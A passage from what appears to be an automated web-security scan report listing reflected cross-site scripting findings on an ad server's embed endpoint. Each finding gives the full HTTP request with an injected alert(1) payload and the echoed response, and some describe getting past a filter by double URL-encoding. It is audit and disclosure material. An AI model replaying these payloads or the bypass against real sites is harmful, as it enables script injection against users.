This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061254a3b0'-alert(1)-'e3b21ac569d&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:49 GMT; path=/
Set-Cookie: i_1=33:353:78:3:0:34115:1296351649:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 872

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061254a3b0'-alert(1)-'e3b21ac569d&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc491'-alert(1)-'2e6b8e0e1b9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8dc491'-alert(1)-'2e6b8e0e1b9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:31 GMT; path=/
Set-Cookie: i_1=33:353:811:3:0:34115:1296351691:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:41:31 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 875

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8dc491'-alert(1)-'2e6b8e0e1b9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bdca'-alert(1)-'8e62565ed1b was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ2bdca'-alert(1)-'8e62565ed1b&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:14 GMT; path=/
Set-Cookie: i_1=33:353:78:3:0:34115:1296351674:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:41:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 872

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ2bdca'-alert(1)-'8e62565ed1b&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d80d9%2522%253balert%25281%2529%252f%252f1b378966a2b was submitted in the REST URL parameter 2. This input was echoed as d80d9";alert(1)//1b378966a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d80d9%2522%253balert%25281%2529%252f%252f1b378966a2b/353.0.js.120x30/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357d80d9";alert(1)//1b378966a2b/353.0.js.120x30/1296353113**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a19%2522%253balert%25281%2529%252f%252fee7b513d736 was submitted in the REST URL parameter 3. This input was echoed as 67a19";alert(1)//ee7b513d736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3067a19%2522%253balert%25281%2529%252f%252fee7b513d736/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3067a19";alert(1)//ee7b513d736/1296353115**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77762'-alert(1)-'d9eb44523fa was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=2825348877762'-alert(1)-'d9eb44523fa&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:35 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34115:1296351635:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 876

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=2825348877762'-alert(1)-'d9eb44523fa&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {

...[SNIP]...

5.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64672'-alert(1)-'6bd526f1d90 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G64672'-alert(1)-'6bd526f1d90&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:22 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34115:1296351622:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:22 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 876

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G64672'-alert(1)-'6bd526f1d90&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       functio
...[SNIP]...

5.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4276'-alert(1)-'863aa542d6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&f4276'-alert(1)-'863aa542d6f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:42:56 GMT; path=/
Set-Cookie: i_1=33:353:811:3:0:34115:1296351776:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:42:56 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 878

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&f4276'-alert(1)-'863aa542d6f=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bdbc'-alert(1)-'ace8d71b6ef was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=80106398bdbc'-alert(1)-'ace8d71b6ef&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:18 GMT; path=/
Set-Cookie: i_1=33:353:812:3:0:38345:1296398958:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=80106398bdbc'-alert(1)-'ace8d71b6ef&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

5.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fc35'-alert(1)-'1d1a7e71671 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!6fc35'-alert(1)-'1d1a7e71671&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:02 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38345:1296398942:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:02 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!6fc35'-alert(1)-'1d1a7e71671&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf10'-alert(1)-'1127fd83b50 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894bdf10'-alert(1)-'1127fd83b50&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

